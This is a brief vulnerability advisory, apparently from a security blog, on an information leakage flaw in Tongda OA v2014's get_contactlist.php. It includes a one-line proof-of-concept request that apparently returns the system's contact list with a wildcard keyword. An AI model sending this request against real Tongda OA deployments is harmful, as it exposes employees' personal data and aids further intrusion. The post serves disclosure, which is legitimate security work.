Post

Tongda Oa V2014 Get_contactlist Php Sensitive Information Leakage Vulnerability

Tongda Oa V2014 Get_contactlist Php Sensitive Information Leakage Vulnerability

Tongda OA v2014 get_contactlist.php sensitive information leakage vulnerability

Vulnerability Description

There is an information leakage vulnerability in Tongda OA v2014 get_contactlist.php file. The attacker can obtain sensitive information through the vulnerability and further attack.

Vulnerability Impact

Tongda OA v2014

Network surveying and mapping

Vulnerability reappears

Version information

img

Verify POC

1
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3

img

This post is licensed under CC BY 4.0 by the author.